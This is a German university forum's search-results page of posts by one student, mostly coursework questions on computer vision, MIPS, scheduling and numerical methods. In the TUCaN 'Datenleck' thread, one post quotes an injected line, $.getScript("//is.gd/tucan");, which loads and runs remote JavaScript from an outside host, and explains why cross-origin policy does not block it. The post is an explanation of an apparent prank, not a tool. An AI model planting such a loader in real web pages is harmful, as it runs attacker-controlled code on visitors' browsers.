Die Suche ergab 21 Treffer

von martin-t
16. Nov 2012 23:09
Forum: Computer Vision 2
Thema: A1 P3 likelihood
Antworten: 2
Zugriffe: 570

Re: A1 P3 likelihood

Yes, I am aware of the truncation / error propagation. I thought that, since we are asked to compute the likelihood (not the log-likelihood) again in 3.4, there should be a different result than 0.
von martin-t
16. Nov 2012 22:23
Forum: Computer Vision 2
Thema: A1 P3 likelihood
Antworten: 2
Zugriffe: 570

A1 P3 likelihood

Hallo, anscheinend habe ich einen Fehler bei der Berechnung des Gaussian likelihood: Es ergibt sich stehts der Wert 0 (in allen Unteraufgaben, daher gehe ich von einem Fehler meinerseits aus). Ist bei der Verwendung von normpdf irgendetwas spezielles zu beachten? Ich normalisiere die Bilder i0 und i...
von martin-t
2. Apr 2012 19:43
Forum: Allgemein
Thema: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlich
Antworten: 9
Zugriffe: 1312

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

@robert: Der Code $.getScript("//is.gd/tucan"); wurde innerhalb eines <script>-Bereiches eingeschleust. $.getScript ist eine jQuery-Methode, //is.gd/tucan ist eine protokoll-relative URL und die Cross-Origin-Policy greift bei JavaScript generell nicht, auch nicht bei dynamisch durch jQuery eingefügt...
von martin-t
2. Apr 2012 01:28
Forum: Allgemein
Thema: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlich
Antworten: 9
Zugriffe: 1312

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Damit wäre der 1. April auch schon wieder beendet. Schön, das newizz es auch herausgefunden hat :wink:. Ob die Lücke bekannt ist, weiß ich nicht - aber vielleicht ließt ja einer aus dem TUCan-Kompetenzteam hier mit :lol:...
von martin-t
1. Apr 2012 01:54
Forum: Allgemein
Thema: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlich
Antworten: 9
Zugriffe: 1312

Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlich

Gerade eben drüber gestolpert :shock: : http://www.info.tucan.tu-darmstadt.de/v ... achrichten

Wird hoffentlich noch eine Rundmail diesbezüglich geben, gerade wenn Benutzerkonten komprommitiert wurden...
von martin-t
1. Okt 2010 19:08
Forum: Archiv
Thema: Klausur SS10
Antworten: 155
Zugriffe: 8246

Re: Klausur SS10

Wenn es sich einrichten lässt - ich freue mich ebenfalls über die Fotos per PM. Vielen Dank im Voraus!
von martin-t
16. Mär 2010 03:59
Forum: Archiv
Thema: MTTF = Integral von R(t) -> sollte t*R(t) sein, oder?
Antworten: 5
Zugriffe: 801

Re: MTTF = Integral von R(t) -> sollte t*R(t) sein, oder?

Hi deFusel, erstmal: ganz ruhig :wink: , wenn in den Folien Fehler sind ist das nur gut für dich bei der Klausureinsicht... Zu dem Problem: Ich denke, es gilt auch auf Folie 12 das in Folie 11für R(t) eingeführe exponentielle Modell. Ansonsten hättest du Recht und das angegebene Integral zur Berechn...
von martin-t
22. Jan 2010 03:21
Forum: Archiv
Thema: Pr - $pc
Antworten: 7
Zugriffe: 526

Re: Pr - $pc

Die Frage ist, soll $pc für den Programmierer sichtbar, d.h. lesbar sein? Oder ist es erlaubt, den $pc als internes Register zu implementieren, wie es in der MIPS ISA vorgesehen ist? Laut Aufgabenstellung ist MIPS* eine Untermenge von MIPS, folglich sollten alle MIPS*-Programme auch in MARS laufen, ...
von martin-t
21. Jan 2010 20:36
Forum: Archiv
Thema: Round Robin
Antworten: 17
Zugriffe: 981

Re: Round Robin

Guten Abend, bezüglich des Schedulings ergeben sich auch bei mir noch ein paar Fragen :? : Frage 1: Wie sollen Swapping und Scheduling kombiniert werden? Scheduling: Jeder Prozess wird 16 Befehle "lang" ausgeführt, danach wird zum nächsten wartenden Prozess gewechselt. Swapping: Jeder Prozess wird 1...
von martin-t
6. Jan 2010 19:10
Forum: Archiv
Thema: Praktikum 3: Unvollst. Definition in (b) und (c)
Antworten: 2
Zugriffe: 412

Re: Praktikum 3: Unvollst. Definition in (b) und (c)

Verwendet man für das Fixpunktverfahren die Relaxationsmatrix -J(xs2)^-1 mit xs2 = (pi, 0), so meldet der veröffentlichte Testcase einen Fehler. Ich / wir sind uns dennoch sehr sicher, keinen Fehler gemacht zu haben, sondern dass diese Variante in den Testcases nicht berücksichtigt ist. Darauf lässt...
von martin-t
16. Dez 2009 17:13
Forum: Archiv
Thema: Hinweise zur Übung 10
Antworten: 14
Zugriffe: 976

Re: Hinweise zur Übung 10

Jetzt ist es klar - danke für die schnelle Antwort zu später Stunde. Hier übrigens noch einmal ein Bild zur Veranschaulichung von Einzelschritt- und Fortpflanzungsfehler: http://www.tu-darmstadt.de/~m_t/pictures/graph.jpg Quelle: http://www.scai.fraunhofer.de/fileadmin/ArbeitsgruppeTrottenberg/WS080...
von martin-t
16. Dez 2009 00:45
Forum: Archiv
Thema: Hinweise zur Übung 10
Antworten: 14
Zugriffe: 976

Re: Hinweise zur Übung 10

Dazu hätte ich noch zwei Fragen: Zu d) - Nur Aufrufe von f(x_k) oder Auswertungen von f an beliebiger Stelle (macht meiner Meinung nach mehr Sinn, wenn es um Aufwand geht)? Zu c) - Wie lassen sich für eine DGL der Form x'(t) = f(t), wie sie in der Aufgabenstellung steht, Lösungen mit unterschiedlich...
von martin-t
10. Dez 2009 18:20
Forum: Archiv
Thema: Praktikum 3: Unvollst. Definition in (b) und (c)
Antworten: 2
Zugriffe: 412

Praktikum 3: Unvollst. Definition in (b) und (c)

In der Praktikumsaufgabe Teil (b) soll für die Relaxationsmatrix die inverse Jacobi-Matrix an der Stelle Xs verwendet werden. Nun gibt es ja zwei stationäre Lösungen Xs1 = (0, 0) und Xs2 = (pi, 0). Wie sollen wir hier verfahren? Im Teil (c) fehlt hinter "Wiederholend werden dazu folgende Schritte du...
von martin-t
9. Dez 2009 10:13
Forum: Archiv
Thema: Hausübung 2, Aufgabe 2.3
Antworten: 3
Zugriffe: 186

Re: Hausübung 2, Aufgabe 2.3

Wieso nicht a? Die Exception-Guard von aufgerufenen Funktionen (Rekursiv oder nicht) hat keinen Einfluss auf die Exception-Guard von b (meines Wissens nach).
von martin-t
8. Dez 2009 07:52
Forum: Archiv
Thema: Matchingkalkül - x | r
Antworten: 1
Zugriffe: 138

Re: Matchingkalkül - x | r

Machen wir es formal, wie es sich für FGDI gehört: Für die Regel Solve gilt, dass θ = {x/r}. Die Menge θrep ist definiert als {(x, σ(x)) ∈ V × T(Σ, V) | σ(x) != x}, daher gilt r ∈ T(Σ, V). Aus der Prämisse A U {x .= r} , σ und der Definition von x .= r als Abkürzung für (x, r) ∈ T(Σ, V) × T(Σ) folgt...

Zur erweiterten Suche